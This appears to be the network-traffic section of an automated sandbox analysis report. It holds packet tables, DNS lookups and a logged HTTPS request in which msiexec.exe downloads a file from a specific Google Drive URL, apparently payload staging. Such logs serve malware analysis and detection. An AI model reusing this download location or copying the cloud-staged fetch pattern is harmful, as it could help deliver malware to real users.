Dec 3, 2024 16:44:22.598071098 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:22.598354101 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:22.598407030 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:22.599080086 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:22.639333010 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:23.532397032 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:23.532538891 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:23.532645941 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:23.532686949 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:23.532773972 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:23.541776896 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:23.541826010 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:23.542181015 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:23.542388916 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:23.542403936 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:25.328674078 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:25.328752041 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:25.331906080 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:25.331928015 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:25.332174063 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:25.332240105 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:25.332541943 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:25.379343987 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:26.317567110 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:26.317718983 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:26.318268061 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:26.318327904 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:26.318416119 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:26.318454981 CET	443	49725	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:26.318504095 CET	49725	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:26.436965942 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:26.437019110 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:26.437191963 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:26.437383890 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:26.437393904 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:28.194206953 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:28.194475889 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:28.194964886 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:28.195034027 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:28.199289083 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:28.199310064 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:28.199585915 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:28.199636936 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:28.200088024 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:28.243331909 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:29.111825943 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:29.111933947 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:29.111948967 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:29.111995935 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:29.112260103 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:29.112297058 CET	443	49726	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:29.112353086 CET	49726	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:29.124687910 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:29.124728918 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:29.124805927 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:29.125021935 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:29.125031948 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:30.818402052 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:30.818623066 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:30.819070101 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:30.819082975 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:30.819258928 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:30.819264889 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.772964954 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.773149967 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:31.773467064 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.773540020 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:31.773549080 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.773561001 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.773601055 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:31.773920059 CET	49727	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:31.773937941 CET	443	49727	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:31.889610052 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:31.889667034 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:31.889759064 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:31.890043020 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:31.890058994 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:33.628060102 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:33.628158092 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:33.628840923 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:33.628901958 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:33.630754948 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:33.630767107 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:33.631026030 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:33.631092072 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:33.631457090 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:33.675333023 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:34.552949905 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:34.553029060 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:34.553059101 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:34.553113937 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:34.553164005 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:34.553199053 CET	443	49728	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:34.553248882 CET	49728	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:34.571691990 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:34.571746111 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:34.571810961 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:34.572031021 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:34.572050095 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:36.309745073 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:36.309849024 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:36.310332060 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:36.310350895 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:36.310488939 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:36.310492992 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.577512980 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.577613115 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:37.577975035 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.578018904 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:37.578507900 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.578547001 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:37.578553915 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.578594923 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:37.578757048 CET	49729	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:37.578771114 CET	443	49729	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:37.702115059 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:37.702155113 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:37.702245951 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:37.702558994 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:37.702569008 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:39.492083073 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:39.492206097 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:39.492862940 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:39.492934942 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:39.494385004 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:39.494395971 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:39.494642019 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:39.494697094 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:39.494968891 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:39.539326906 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:40.420742035 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:40.421013117 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:40.421161890 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:40.421169043 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:40.421205997 CET	443	49730	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:40.421436071 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:40.421452045 CET	49730	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:40.430839062 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:40.430888891 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:40.430993080 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:40.431189060 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:40.431202888 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:42.172291994 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:42.172488928 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:42.172950983 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:42.172961950 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:42.173151016 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:42.173155069 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128418922 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128550053 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128559113 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.128587008 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128601074 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.128635883 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.128948927 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128988981 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.128993034 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.129035950 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.129359007 CET	49731	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:43.129373074 CET	443	49731	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:43.249119043 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:43.249171972 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:43.249274015 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:43.249536991 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:43.249551058 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:45.198451042 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:45.198586941 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:45.199331045 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:45.199342012 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:45.199601889 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:45.199608088 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:46.108726025 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:46.108844042 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:46.108876944 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:46.108925104 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:46.109029055 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:46.109086990 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:46.109138012 CET	443	49732	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:46.109147072 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:46.109195948 CET	49732	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:46.133516073 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:46.133586884 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:46.133687019 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:46.134076118 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:46.134090900 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:47.873477936 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:47.876591921 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:47.877047062 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:47.877060890 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:47.877211094 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:47.877217054 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.831398010 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.831494093 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:48.832250118 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.832303047 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:48.832319975 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.832331896 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.832359076 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:48.832365036 CET	443	49733	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:48.832376003 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:48.832390070 CET	49733	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:48.952140093 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:48.952203035 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:48.952291965 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:48.952579975 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:48.952589989 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:50.647660971 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:50.647816896 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:50.648356915 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:50.648367882 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:50.648525000 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:50.648530960 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:51.564898014 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:51.564980984 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:51.565010071 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:51.565053940 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:51.567701101 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:51.567735910 CET	443	49734	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:51.567783117 CET	49734	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:51.586157084 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:51.586263895 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:51.586350918 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:51.586570978 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:51.586611986 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:53.328178883 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:53.328253984 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:53.328727007 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:53.328744888 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:53.328923941 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:53.328937054 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:54.318422079 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:54.318547010 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:54.319395065 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:54.319459915 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:54.321230888 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:54.321288109 CET	443	49735	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:54.321352959 CET	49735	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:54.452446938 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:54.452507973 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:54.452586889 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:54.452855110 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:54.452868938 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:56.240212917 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:56.240490913 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:56.240951061 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:56.241014004 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:56.242995024 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:56.243012905 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:56.243284941 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:56.243334055 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:56.244051933 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:56.287337065 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:57.168283939 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:57.168440104 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:57.168477058 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:57.168546915 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:57.168616056 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:57.168677092 CET	443	49736	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:57.168725014 CET	49736	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:57.192662001 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:57.192713976 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:57.192784071 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:57.193043947 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:57.193056107 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:58.936523914 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:58.936599970 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:58.939588070 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:58.939594984 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:58.939846039 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:58.939898014 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:58.940387011 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:58.987349033 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:59.902368069 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:59.902553082 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:59.902667046 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:59.902724028 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:59.903300047 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:59.903366089 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:59.903420925 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:59.903433084 CET	443	49737	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:59.903476954 CET	49737	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:45:00.030179977 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:00.030239105 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:00.030313015 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:00.030597925 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:00.030611992 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:01.820372105 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:01.820453882 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:01.821099043 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:01.821161032 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:01.822551012 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:01.822570086 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:01.822789907 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:01.822838068 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:01.823111057 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:01.867340088 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:02.752809048 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:02.752948046 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:02.752979994 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:02.753025055 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:02.753155947 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:02.753187895 CET	443	49738	172.217.19.174	192.168.2.9
Dec 3, 2024 16:45:02.753237009 CET	49738	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:45:02.764986038 CET	49739	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:45:02.765036106 CET	443	49739	142.250.181.1	192.168.2.9
Dec 3, 2024 16:45:02.765117884 CET	49739	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:45:02.765377998 CET	49739	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:45:02.765393019 CET	443	49739	142.250.181.1	192.168.2.9
Dec 3, 2024 16:45:04.550244093 CET	443	49739	142.250.181.1	192.168.2.9
Dec 3, 2024 16:45:04.550528049 CET	49739	443	192.168.2.9	142.250.181.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 16:43:47.133393049 CET	53934	53	192.168.2.9	1.1.1.1
Dec 3, 2024 16:43:47.273042917 CET	53	53934	1.1.1.1	192.168.2.9
Dec 3, 2024 16:43:50.036622047 CET	51526	53	192.168.2.9	1.1.1.1
Dec 3, 2024 16:43:50.265825987 CET	53	51526	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 16:43:47.133393049 CET	192.168.2.9	1.1.1.1	0x10e4	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 16:43:50.036622047 CET	192.168.2.9	1.1.1.1	0x5fcc	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 16:43:47.273042917 CET	1.1.1.1	192.168.2.9	0x10e4	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 3, 2024 16:43:50.265825987 CET	1.1.1.1	192.168.2.9	0x5fcc	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49709	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:43:49 UTC	216	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-12-03 15:43:50 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:43:49 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-eh8L6dLPZEBdViLZilJweQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com 